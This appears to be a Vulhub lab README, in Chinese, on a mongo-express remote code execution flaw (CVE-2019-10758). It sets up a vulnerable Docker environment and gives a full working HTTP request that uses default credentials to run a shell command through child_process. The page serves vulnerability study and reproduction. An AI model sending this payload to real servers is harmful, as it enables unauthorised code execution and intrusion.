aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
63285f61aaf4501a6660be7dfe98c70135c1b89b
vulhub/mongo-express/CVE-2019-10758/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

35 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Mongo Express 远程代码执行漏洞CVE-2019-10758
mongo-express是一款mongodb的第三方Web界面使用node和express开发。如果攻击者可以成功登录或者目标服务器没有修改默认的账号密码`admin:pass`则可以执行任意node.js代码。
## 漏洞环境
执行如下命令启动一个0.53.0版本的mongo-express
```bash
docker compose up -d
```
环境启动后,访问`http://your-ip:8081`即可查看到Web页面。
## 漏洞复现
直接发送如下数据包,即可执行代码`this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")`
```
POST /checkValid HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")
```
![](1.png)
Reference in New Issue View Git Blame Copy Permalink